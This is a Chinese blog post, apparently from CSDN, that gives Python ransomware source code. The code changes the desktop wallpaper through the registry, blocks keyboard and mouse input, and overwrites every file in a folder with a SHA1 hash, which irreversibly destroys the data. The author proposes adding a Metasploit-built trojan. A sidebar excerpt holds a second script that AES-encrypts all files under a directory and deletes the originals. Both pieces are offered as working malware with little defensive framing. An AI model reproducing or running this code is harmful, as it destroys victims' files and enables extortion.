勒索病毒用什么语言写,勒索病毒代码python

最新推荐文章于 2025-05-06 19:39:57 发布
最新推荐文章于 2025-05-06 19:39:57 发布
阅读量728 收藏 8
点赞数 3
CC 4.0 BY-SA版权
文章标签: python 开发语言 人工智能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Fixf4556/article/details/137236151
本文介绍了如何使用Python编写勒索病毒,涉及所需的模块如win32api、hashlib等,展示了更换背景、锁定输入、批量加密文件以及可能的后续操作,包括自定义解密脚本和添加恶意软件载荷。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

大家好,给大家分享一下python写勒索病毒都需要什么工具和材料,很多人还不知道这一点。下面详细解释一下。现在让我们来看看!

前言:

今天下午上学,用python写个勒索脚本然后打包成exe是个不错的选择

我们来搞事情吧。看那学校我就不想上学Python祝生日快乐创意代码

0x01:

要用到的模块,各位请自行准备

import win32api,win32con,win32gui

from ctypes import *

import hashlib

import os

import time

万事俱备,只欠东风。

0x01:代码

import win32api,win32con,win32gui

from ctypes import *

import hashlib

import os

import time

#换背景

def sd(bmp):

k=win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER,"Control panel\\Desktop",0,win32con.KEY_SET_VALUE)

win32api.RegSetValueEx(k,"Wa;;paperStyle",0,win32con.REG_SZ,"0")

win32api.RegSetValueEx(k,"TileWallpaper",0,win32con.REG_SZ,"0")

win32gui.SystemParametersInfo(win32con.SPI_SETDESKWALLPAPER,bmp,1+2)

sd('1.jpg')

#锁定输入

def cyes():

user32 = windll.LoadLibrary('user32.dll')

user32.BlockInput(True)

time.sleep(10)

cyes()

#批量读取文件并加密

def jiami(file):

path=os.path.expanduser(file)

for f in os.listdir(path):

swd=f.strip()

print(f.strip())

with open(file+"/"+swd,'rb+') as w:

pod=w.readline()

sha1=hashlib.sha1(pod)

osv=sha1.hexdigest()

with open(file+"/"+swd,'wb') as b:

gs=bytes(osv,encoding='utf-8')

b.write(gs)

print('[+]加密完成')

jiami('E:\PyCharm 2017.2.4\cx')

测试效果如下

使用sha1算法加密,你其实还可以自己写个解密脚本。

后续其实可以加一个msf生成的马子

大牛勿喷,谢谢合作。

Fixf4556
关注
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
【紧急警示】一次成功阻断Weaxor勒索病毒家族加密之路
最新发布
solarset的博客
06-10 996
在我们对5月份处理的各类勒索病毒入侵事件统计中,
简单的病毒编程代码Python,利用python勒索病毒
热门推荐
纸尿裤排行
09-16 1万+
●介绍用QQ看电视的方法●用最简单的方法让QQ上的好友露出原形●QQ使用的七大非常规秘籍●看完这些,你就是电脑高手了●XP扮靓进行时 文件夹颜色随心换●电脑常用密码破解●保护隐私:Windows八大保密技巧●Windows操作系统快速关机之谜●恢复丢失数据的方法●连接宽带时出错表示的意思●电脑高手应用技巧荟萃●想让你的电脑键盘说话吗?2.打开我的电脑,依次打开“工具/文件夹选项/查看”,里面有一个“隐藏受保护的操作系统文件”,把前面的勾去掉,会出来一个警告窗口,选“是”。
一文彻底看懂十进制IP\主机IP\网络IP的三个IP字节转换
龚建华的博客
04-27 835
本文操作的使用软件是VS2010。采用语言是C语言。 1.字节存储顺序 多字节数据的各字节在微机中的存放顺序有小端(Little Endian)和大端(Big Endian)之分。Intel体系芯片使用小端,IBM的Power PC使用大端。 例如,将0x12345678入到1000h开始的内存中,结果如图。 地址 小端方式 大端...
勒索病毒中招者有救了!这款开源软件能恢复数据
weixin_34321977的博客
06-02 317
北京时间5月19日早间消息,法国Quarkslab研究员阿德里安·古奈特(Adrien Guinet)周四表示,如果Windows XP系统遭到WCry勒索病毒的感染,那么用户可以自行解密数据,而不必支付300至600美元的赎金。 古奈特发布了一款软件。他表示,该软件帮他发现了实验室中被感染Windows XP计算机所需的数据解密密钥。该软件尚未在Win...
python勒索病毒代码_勒索病毒GandCrab-v5.04完整分析
weixin_42500477的博客
01-29 3720
原程序分析基本文件信息ExeInfo 查看文件信息,PE32位且有壳Ollydbg 入口点代码如下脱壳后单步跟到OEP,dump内存修复IAT,成功脱壳后用 Die 查看编译语言为 Delphi7IDA 和 OD 的入口代码反沙箱手段消息循环复杂的消息循环,使用了定时器消息,以及自定义 SendMsg,发送大量消息,使程序的运行时间延长设备上下文长时间消息循环到达核心代码区,里面又有许多的动态解密...
Python勒索病毒模拟
BrosyveryOK的博客
10-18 2809
勒索病毒能将电脑上的一些重要文件进行数据加密,将文件以二进制的形式进行加密处理,导致无法成功打开加密后的文件,要打开必须要解密,要解密必须要解密程序,从而让我们能够进行勒索。​ 勒索病毒的原理不难,简单来说就是对数据的加密,而解密的办法一般只有我们自己知道,接下去就让我们来编一些简单的勒索病毒吧!​ 勒索病毒更多情况下是.exe的可执行文件,一般情况下都是由编译型语言后编译形成。
这是一个勒索病毒的源文件,基于python
01-31
基于Python勒索病毒源文件表明,攻击者使用Python语言来编恶意代码Python语言以其简单易学和强大的库支持,成为了编恶意软件的一个受欢迎的选择,尤其在脚本编和快速原型开发方面具有优势。 Python语言的...
WannaCry:勒索病毒WannaCry反编译
03-23
勒索病毒WannaCry反编译源码 勒索病毒WannaCry通过高危入侵“永恒之蓝”(EternalBlue)在世界范围内爆发,据报道包括美国,英国,中国,俄罗斯,西班牙,意大利,越南等百余个国家均遭受大规模攻击。 病毒名称(Virus Name):WannaCrypt,WannaCry,WanaCrypt0r,WCrypt,WCRY 加密文件类型(它要加密的文件类型是): .doc,.docx,.xls,.xlsx,.ppt,.pptx,.pst,.ost,.msg,.eml,.vsd,.vsdx,.txt,.csv,.rtf,.123和.wks ,.wk1,.pdf,.dwg,.onetoc2,.snt,.jpeg,.jpg,.docb,.docm,.dot,.dotm,.dotx,.xlsm,.xlsb,.xlw,.xlt 、. xlm,.xlc,.xltx,.xltm,.pptm
Python实现简单的勒索病毒
bossDDYY的博客
09-02 3356
勒索病毒一种:将文件以base64字符串形式读取,然后对字符串进行加密(加密方式任取 只要可以解密即可)python实现勒索病毒
python简易实现勒索病毒
qq_62585870的博客
05-06 905
本次实验主要使用Crypto库实现简易的加密解密定义了一个名为Descrypt的函数,接受一个参数filename,表示要解密的文件路径。
浅析勒索病毒
优快云_YJX的博客
05-12 1501
这里我们先做一下准备: 1.在一个重要文件比较少的盘里创建一个文件夹,然后在这个文件夹下再创建很多个有内容的文本文档和文件夹。文本文档里可以根据需要是字母还是数字,还是什么字符**(总之它的ASCII码值比较好找就是了)** 如以下这种: 2.将勒索病毒的源代码保存在另一个盘的一个目录下,反正最后只需要.exe文件。 3.浅层的方法就是通过文件读去 破坏里面的内容 修改或者加密 这个程序的关键是逻辑思维 4.计算机中所有的内容分为两种:都是树状结构 1)文件夹 2)文件 exe
勒索病毒代码被破译:竟然发现“自毁开关”
weixin_34409822的博客
07-04 469
爆发于5月12日晚间的勒索病毒搅乱了全球网络,也让企业及机构用户人人自危。 统计数据显示,目前全球100多个国家和地区都被勒索病毒所影响,估计全球已有超过10万台电脑被感染。   其中,截止5月13日19点,中国已有28388家机构被感染。 不过,幸运的是,勒索病毒继续蔓延的势头已经被扑灭。 据@英国那些事发布消息,一个英国网络安全人员通宵分析,意外的...
勒索病毒1.0
guboyu1的博客
11-17 313
上次讲了如何用system函数进行恶搞(本专栏第一),这次我们来实操一下。用篡改用户密码的方式进行勒索。
python 遍历目录下所有文件
qq_35699528的博客
12-06 498
def all_path(dirname): result = []#所有的文件 for maindir, subdir, file_name_list in os.walk(dirname): print("1:",maindir) #当前主目录 print("2:",subdir) #当前主目录下的所有目录 print("...
勒索病毒c语言代码,勒索病毒原理解析
weixin_35355756的博客
05-22 6350
一、编程思路什么是勒索病毒:遍历你电脑上所有文件,并且用加密算法加密,然后把加密秘钥发送到自己邮箱里,弹出窗口。工具:操作系统API,加密算法思路:1.程序设计 思路规划清楚1.1 加密单个文件1.2 遍历文件系统并加密文件2.工程实现: 编程3.测试上线 :、测试欢迎加入学习群【892643663】,获取全套免费C/C++企业实战级课程资源(素材+源码+视频)和编译大礼包二、代码解析//文件遍...
python勒索代码
03-29
### Python勒索软件的实现代码与工作原理 #### 工作原理概述 勒索软件的核心目标是对用户的重要数据进行加密,使其不可访问,并向受害者索取赎金以换取解密密钥。Python作为一种灵活的语言,能够快速构建这种类型的恶意程序来演示其工作机制[^4]。 以下是勒索软件的主要组成部分及其功能描述: 1. **文件查找模块** 遍历指定目录或整个磁盘上的特定扩展名文件(如`.docx`、`.jpg`等),并将这些文件作为潜在的目标对象。 2. **加密模块** 使用强大的加密算法(通常为AES对称加密配合RSA非对称加密)对找到的文件逐一加密。加密后的文件会被替换原文件存储位置的内容,同时更改文件名为随机字符串加上特殊后缀以便识别[^5]。 3. **删除原始备份/影子副本** 为了防止恢复未被破坏的数据,某些高级版本还会执行命令清除Windows系统的卷影复制服务(VSS),从而阻止通过该方式找回丢失的信息。 4. **通知界面** 创建一个弹窗或者修改桌面背景图片显示给受害者的说明文档链接以及付款指引等内容[^1]。 --- #### 示例代码片段 下面提供了一个简化版的Python脚本用于教学目的展示基本概念,请勿非法使用! ```python import os from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives import serialization, hashes from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC import base64 def generate_rsa_keys(): private_key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend() ) public_key = private_key.public_key() pem_priv = private_key.private_bytes( encoding=serialization.Encoding.PEM, format=serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption() ) pem_pub = public_key.public_bytes( encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo ) return pem_priv.decode(), pem_pub.decode() def encrypt_file(file_path, pub_key): iv = os.urandom(16) cipher = Cipher(algorithms.AES(os.urandom(32)), modes.CFB(iv), backend=default_backend()) encryptor = cipher.encryptor() with open(file_path, 'rb') as f: data = f.read() encrypted_data = encryptor.update(data) + encryptor.finalize() # Encrypt AES Key using RSA Public Key (simplified here) aes_key_encrypted = b'encrypted_aes_key' result = { "iv": base64.b64encode(iv).decode(), "data": base64.b64encode(encrypted_data).decode(), "aes_key": aes_key_encrypted.decode() } with open(f"{file_path}.enc", 'w') as ef: ef.write(str(result)) os.remove(file_path) if __name__ == "__main__": priv_key, pub_key = generate_rsa_keys() target_directory = './test_files' for root, dirs, files in os.walk(target_directory): for file in files: full_path = os.path.join(root, file) try: encrypt_file(full_path, pub_key) print(f"Encrypted {full_path}") except Exception as e: print(f"Failed to encrypt {full_path}: {e}") ``` 上述代码实现了以下几个关键步骤: - 利用 `cryptography` 库生成一对RSA公私钥; - 对选定路径下的所有文件应用AES-CFB模式加密处理并保存新的“.enc”格式文件; - 删除源文件完成模拟攻击行为。 注意:实际部署时还需要考虑更多细节问题,例如异常捕获、日志记录等功能增强安全性的同时也增加了复杂度。 --- ### 安全防护建议 尽管了解威胁有助于制定更好的防御策略,但也应采取适当措施保护自己的设备免受真实世界中的网络犯罪侵害。具体方法包括但不限于定期更新操作系统补丁、安装可靠的防病毒产品以及谨慎对待未知来源邮件附件等[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值